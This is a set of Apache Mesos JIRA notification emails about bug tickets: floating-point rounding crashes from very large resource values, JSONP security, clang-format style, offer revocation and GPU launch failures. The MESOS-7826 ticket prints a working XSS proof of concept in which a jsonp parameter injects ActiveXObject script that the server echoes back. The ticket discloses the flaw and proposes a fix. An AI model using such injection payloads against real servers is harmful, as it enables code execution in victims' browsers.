https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250290#comment-16250290
 ] 

Benjamin Mahler edited comment on MESOS-8129 at 11/13/17 10:54 PM:
---

Thanks Bruce for the well written ticket. Determining it more formally would 
take me some time given the fractional component complicates matters over 
integers in doubles (I.e. just use Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?


was (Author: bmahler):
Thanks Bruce for the well written ticket. I think I could compute this 
empirically based on adding 0.001 until I see the resultant skip a .001. 
Determining it more formally would take me some time given the fractional 
component complicates matters over integers in doubles (I.e. just use 
Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-5918) Replace jsonp with a more secure alternative

2017-11-13 Thread Alexander Rojas (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-5918?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250447#comment-16250447
 ] 

Alexander Rojas commented on MESOS-5918:


For backwards compatibility i think it will be a while before we can completely 
remove the {{jsonp}} parameter from our codebase, however that doesn't mean we 
cannot mitigate the problem of the possible attacks by properly treating the 
{{jsonp}} parameter.

As it is currently implemented, we just return whatever value was given in the 
parameter, e.g.:

{code}
return OK(_flags(), request.url.query.get("jsonp"));
{code}

But we should probably parse that {{jsonp}} is just a JS identifier. Apparently 
just Internet Explorer up to version 11 is vulnerable to this attack.

> Replace jsonp with a more secure alternative
> 
>
> Key: MESOS-5918
> URL: https://issues.apache.org/jira/browse/MESOS-5918
> Project: Mesos
>  Issue Type: Improvement
>  Components: webui
>Reporter: Yan Xu
>
> We currently use the {{jsonp}} technique to bypass CORS check. This practice 
> has many security concerns (see discussions on MESOS-5911) so we should 
> replace it with a better alternative.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-7826) XSS in JSONP parameter

2017-11-13 Thread Alexander Rojas (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250448#comment-16250448
 ] 

Alexander Rojas commented on MESOS-7826:


For backwards compatibility i think it will be a while before we can completely 
remove the {{jsonp}} parameter from our codebase, however that doesn't mean we 
cannot mitigate the problem of the possible attacks by properly treating the 
{{jsonp}} parameter.

As it is currently implemented, we just return whatever value was given in the 
parameter, e.g.:

{code}
return OK(_flags(), request.url.query.get("jsonp"));
{code}

But we should probably parse that {{jsonp}} is just a JS identifier. Apparently 
just Internet Explorer up to version 11 is vulnerable to this attack.

> XSS in JSONP parameter
> --
>
> Key: MESOS-7826
> URL: https://issues.apache.org/jira/browse/MESOS-7826
> Project: Mesos
>  Issue Type: Bug
>  Components: json api
> Environment: Running as part of DC/OS in a docker container.
>Reporter: Vincent Ruijter
>Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into 
> account the following url: 
> https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET 
> /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
>  HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 
> Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 
> 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01
>  19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing 
> the file (state.js), it will pop-up a calculator. It's my recommendation to 
> apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-3083) Doing 'clone' on Linux with the CLONE_NEWUSER namespace type can drop root privileges.

2017-11-13 Thread James Peach (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-3083?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250452#comment-16250452
 ] 

James Peach commented on MESOS-3083:


This test is running a task that enters a set of new namespaces, then attempts 
to escalate back to the set of root namespaces. This isn't something that we 
would expect to work with user namespaces (in fact, we should expect that user 
namespaces would explicitly prevent this).

> Doing 'clone' on Linux with the CLONE_NEWUSER namespace type can drop root 
> privileges.
> --
>
> Key: MESOS-3083
> URL: https://issues.apache.org/jira/browse/MESOS-3083
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
> Environment: Ubuntu 14.04 (virtual machine)
>Reporter: Benjamin Hindman
>  Labels: mesosphere
>
> The namespace tests attempt to clone a process with all namespaces that are 
> available from the kernel which includes the 'user' namespace in Ubuntu 14.04 
> which causes the child process to be user 'nobody' instead of user 'root' 
> after invoking 'clone' which is bad because the test requires that the child 
> process is 'root' and so things fail (because of insufficient permissions). 
> For now, we explicitly ignore the 'user' namespace in the tests, but this 
> issue is to track exactly how we might want to manage this going forward.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8174:

Description: 
Aggregate initializations are incorrectly indented. I would expect the 
following indention,

{code}
Foo bar{
123,
456,
789};
{code}

Instead this is indented as

{code}
Foo bar{123,
456,
789};
{code}

Forcing a line break after the opening curly incorrectly indents the arguments 
with two instead of four spaces,

{code}
Foo bar{

  123,
  456,
  789};
{code}

The [Google C++ style 
guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
 suggests to
{quote}
Format a braced initializer list exactly like you would format a function call 
in its place.
{quote}
and our style guide demands
{quote}
Newline when calling or defining a function: indent with four spaces.
{quote}

  was:
Aggregate initializations are incorrectly indented. I would expect the 
following indention,

{code}
Foo bar{
123,
456,
789};
{code}

Instead this is indented as

{code}
Foo bar{123,
456,
789};
{code}

Forcing a line break after the opening curly incorrectly indents the arguments 
with two instead of four spaces,

{code}
Foo bar{

  123,
  456,
  789};
{code}


> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8198) Update the ReconcileOfferOperations protos

2017-11-13 Thread Greg Mann (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8198?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250472#comment-16250472
 ] 

Greg Mann commented on MESOS-8198:
--

Review here: https://reviews.apache.org/r/63768/

> Update the ReconcileOfferOperations protos
> --
>
> Key: MESOS-8198
> URL: https://issues.apache.org/jira/browse/MESOS-8198
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Greg Mann
>  Labels: mesosphere
>
> Some protos have been committed, but they follow an event-based API.
> We decided to follow the request/response model for this API, so we need to 
> update the protos.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250480#comment-16250480
 ] 

Andrew Schwartzmeyer commented on MESOS-8174:
-

I was surprised to see this formatting take place:

{noformat}
// 4: OK.
allocator->resourcesRecovered(
frameworkId,
agentId,
resources,
filters);

// 5: OK.
allocator->resourcesRecovered(
frameworkId, agentId, resources, filters);
{noformat}

However, that example is from the style-guide. While patched {clang-format} 
preferred {5}, it's not (necessarily) a bug.

> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250479#comment-16250479
 ] 

Andrew Schwartzmeyer commented on MESOS-8174:
-

According to the style guide, this depends on the length of the first line:

{noformat}
// 3: Don't use in this case due to "jaggedness".
allocator->resourcesRecovered(frameworkId,
  agentId,
  resources,
  filters);

// 3: In this case, 3 is OK.
foobar(someArgument,
   someOtherArgument,
   theLastArgument);
{noformat}

So for {{Foo bar\{}} I think it's behaving appropriately.

> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8174) clang-format incorrectly indents aggregate initializations

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8174?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250480#comment-16250480
 ] 

Andrew Schwartzmeyer edited comment on MESOS-8174 at 11/13/17 11:25 PM:


I was surprised to see this formatting take place:

{noformat}
// 4: OK.
allocator->resourcesRecovered(
frameworkId,
agentId,
resources,
filters);

// 5: OK.
allocator->resourcesRecovered(
frameworkId, agentId, resources, filters);
{noformat}

However, that example is from the style-guide. While patched {{clang-format}} 
preferred *5*, it's not (necessarily) a bug.


was (Author: andschwa):
I was surprised to see this formatting take place:

{noformat}
// 4: OK.
allocator->resourcesRecovered(
frameworkId,
agentId,
resources,
filters);

// 5: OK.
allocator->resourcesRecovered(
frameworkId, agentId, resources, filters);
{noformat}

However, that example is from the style-guide. While patched {clang-format} 
preferred {5}, it's not (necessarily) a bug.

> clang-format incorrectly indents aggregate initializations
> --
>
> Key: MESOS-8174
> URL: https://issues.apache.org/jira/browse/MESOS-8174
> Project: Mesos
>  Issue Type: Bug
>Reporter: Benjamin Bannier
>  Labels: clang-format
>
> Aggregate initializations are incorrectly indented. I would expect the 
> following indention,
> {code}
> Foo bar{
> 123,
> 456,
> 789};
> {code}
> Instead this is indented as
> {code}
> Foo bar{123,
> 456,
> 789};
> {code}
> Forcing a line break after the opening curly incorrectly indents the 
> arguments with two instead of four spaces,
> {code}
> Foo bar{
>   123,
>   456,
>   789};
> {code}
> The [Google C++ style 
> guide|https://google.github.io/styleguide/cppguide.html#Braced_Initializer_List_Format]
>  suggests to
> {quote}
> Format a braced initializer list exactly like you would format a function 
> call in its place.
> {quote}
> and our style guide demands
> {quote}
> Newline when calling or defining a function: indent with four spaces.
> {quote}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8217) Don't run linters on every commit

2017-11-13 Thread Benno Evers (JIRA)
Benno Evers created MESOS-8217:
--

 Summary: Don't run linters on every commit
 Key: MESOS-8217
 URL: https://issues.apache.org/jira/browse/MESOS-8217
 Project: Mesos
  Issue Type: Bug
Reporter: Benno Evers


The mesos `pre-commit`  hook is currently running several linters on the source 
code, some of which are even dynamically installed from the internet during a 
commit.

This can hinder development because it also applies to local commits that are 
not intended to be ever published, and can quickly become annoying when 
rebasing old branches.

Instead, we should think about putting these hooks into a separate 
`support/verify-reviews.py` which would be executed when trying to post a 
review, since at this point the patches should be cleaned up and pass all 
linter checks.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250507#comment-16250507
 ] 

Benjamin Mahler commented on MESOS-8129:


Did a binary search and found that the largest 0.001 precision value such that 
precision appears to be lost when incrementing by another 0.001 is: 
8,796,093,022,208.000. Another 0.001 increment moves this to 
8,796,093,022,208.002. This was tested with Apple's clang {{Apple LLVM version 
9.0.0 (clang-900.0.38)}}.

We could perhaps validate a limit of 2^32 which is a little less than half of 
this limit: 4,294,967,296. cc [~mcypark]

[~bmerry] would you be able to send a pull request with the added validation?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Comment Edited] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250507#comment-16250507
 ] 

Benjamin Mahler edited comment on MESOS-8129 at 11/14/17 12:00 AM:
---

Did a binary search and found that the largest 0.001 precision value such that 
precision appears to be lost when incrementing by another 0.001 is: 
8,796,093,022,208.000. This is exactly 2^43 and seems to indicate that 9 bits 
are needed for enough precision to represent 0.001 without loss during 
increment.

Another 0.001 increment moves this to 8,796,093,022,208.002. This was tested 
with Apple's clang {{Apple LLVM version 9.0.0 (clang-900.0.38)}}.

We could perhaps validate a more conservative limit of 2^40 which is still over 
1 billion. cc [~mcypark]

[~bmerry] would you be able to send a pull request with the added validation?


was (Author: bmahler):
Did a binary search and found that the largest 0.001 precision value such that 
precision appears to be lost when incrementing by another 0.001 is: 
8,796,093,022,208.000. Another 0.001 increment moves this to 
8,796,093,022,208.002. This was tested with Apple's clang {{Apple LLVM version 
9.0.0 (clang-900.0.38)}}.

We could perhaps validate a limit of 2^32 which is a little less than half of 
this limit: 4,294,967,296. cc [~mcypark]

[~bmerry] would you be able to send a pull request with the added validation?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8038) Launching GPU task sporadically fails.

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8038?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250520#comment-16250520
 ] 

Benjamin Mahler commented on MESOS-8038:


[~saitejar] to follow up from our discussion on slack, are you able to send a 
test framework that we can easily run to reproduce?

> Launching GPU task sporadically fails.
> --
>
> Key: MESOS-8038
> URL: https://issues.apache.org/jira/browse/MESOS-8038
> Project: Mesos
>  Issue Type: Bug
>  Components: allocation, gpu
>Affects Versions: 1.4.0
>Reporter: Sai Teja Ranuva
>Priority: Critical
> Attachments: mesos-master.log, mesos-slave.INFO.log
>
>
> I was running a job which uses GPUs. It runs fine most of the time. 
> But occasionally I see the following message in the mesos log.
> "Collect failed: Requested 1 but only 0 available"
> Followed by executor getting killed and the tasks getting lost. This happens 
> even before the the job starts. A little search in the code base points me to 
> something related to GPU resource being the probable cause.
> There is no deterministic way that this can be reproduced. It happens 
> occasionally.
> I have attached the slave log for the issue.
> Using 1.4.0 Mesos Master and 1.4.0 Mesos Slave.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8209) mesos master should revoke offers when executor state changes

2017-11-13 Thread Vinod Kone (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8209?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250547#comment-16250547
 ] 

Vinod Kone commented on MESOS-8209:
---

```
However, if you start tasks fast enough, the agents can fill up with executors, 
making it appear as there are no resources available for the scheduler to use. 
Ive seen this on r4.4xlarge machines on aws with executors that consume 0.1 
cpus, 32mb mem where the entire machine will be appear to be filled with 
executors according to the master resource offers. The executors are exiting 
(just after the task finishes), but the resources are not reclaimed because the 
master does not revoke the outstanding resource offers to reflect the change.
```

I don't quite follow this. Master reclaims/recovers executor's resources as 
soon as the agent notifies of the executor's termination. It should've no 
bearing on whether a scheduler is holding onto the offers. In other words, what 
scheduler is holding onto is offered but unallocated resources; what master 
recovers resources from on tasks/executor termination is allocated resources.

Can you share some logs that show the issue?

> mesos master should revoke offers when executor state changes
> -
>
> Key: MESOS-8209
> URL: https://issues.apache.org/jira/browse/MESOS-8209
> Project: Mesos
>  Issue Type: Bug
>Reporter: Jack Crawford
>Assignee: Vinod Kone
>
> Currently, the mesos master does not revoke offers when the number of 
> executors on an agent decreases. This is a problem under certain conditions, 
> such when running a workflow that starts lots of small tasks on agents, with 
> a one executor per task model, a master that does not revoke resources after 
> a set amount of time, and a scheduler that does not reject resources.
> The problem is that when running a mono-scheduler framework (which you might 
> want to do to easily enforce authentication requirements, have a full view of 
> all scheduled tasks, etc), in order to respond instantly when new tasks come 
> in I have the scheduler simply hang on to all resource offers it receives, 
> and the master is set to never revoke offers. This way the scheduler always 
> has a pool of resources to quickly service new requests as they come in.
> However, if you start tasks fast enough, the agents can fill up with 
> executors, making it appear as there are no resources available for the 
> scheduler to use. Ive seen this on r4.4xlarge machines on aws with executors 
> that consume 0.1 cpus, 32mb mem where the entire machine will be appear to be 
> filled with executors according to the master resource offers. The executors 
> are exiting (just after the task finishes), but the resources are not 
> reclaimed because the master does not revoke the outstanding resource offers 
> to reflect the change.
> You can replicate this pretty easily if you schedule tasks that finish 
> instantly with a 1-1 executor to task ratio. I find that if I schedule ~1000 
> tasks this way on a single r4.4xlarge machine, usually 600-700 will finish 
> before all the resource offers to the scheduler fill up and the agent appears 
> to be "full" of executors.
> Changing the scheduler/master to periodically reject/revoke resources fixes 
> the problem.
> My suggestion is for the master to revoke and reissue resource offers when 
> the executor count changes on an agent.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Bruce Merry (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250928#comment-16250928
 ] 

Bruce Merry commented on MESOS-8129:


> Also, I'm curious what your use case is, can you tell me?

We have tasks with high but very predictable network bandwidth. I create a 
resource for incoming and outgoing bandwidth on each interface (not isolated). 
I used bits/second as the unit, because I was tired of writing multiplications 
and divisions by 10^6 for "mem" resources, which is why the numbers get high. 
Then a script sets the resources for each agent by reading 
/sys/class/net//speed and multiplying by 10^6. It turns out that 
unplugging the NIC causes that file to contain 4294967295, which resulted in a 
resource being set as 429496729500.

Here's my theoretical analysis. Let's say that we set the limit to X, which is 
a power of 2. Numbers slightly less than X have X/2 as the implicit 1, and 
X/2^53 as ULP. Thus, rounding a multiple of 0.001 to the nearest float 
introduces error up to X/2^54. Adding/subtracting two such values then has 
error up to X/2^53. This needs to be less than 0.0005, so that we can turn it 
into the proper multiple of 0.001. The largest power-of-2 X satisfying this is 
2^42.

I agree that a more conservative limit of 2^40 is probably a better idea, and 
would still be large enough for my use case (we have 40Gb/s NICs, so we'd still 
have 10x headroom).

> Bruce Merry would you be able to send a pull request with the added 
> validation?

Eventually maybe, but the next several months are a crunch time for us so I 
definitely won't be able to until April, and there is still another issue where 
I want to contribute code first. There is also still the question of where the 
validation should happen: only in agent startup, or also in processing client 
requests?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had let to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger that the CHECK failed due to a rounding error on the order of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
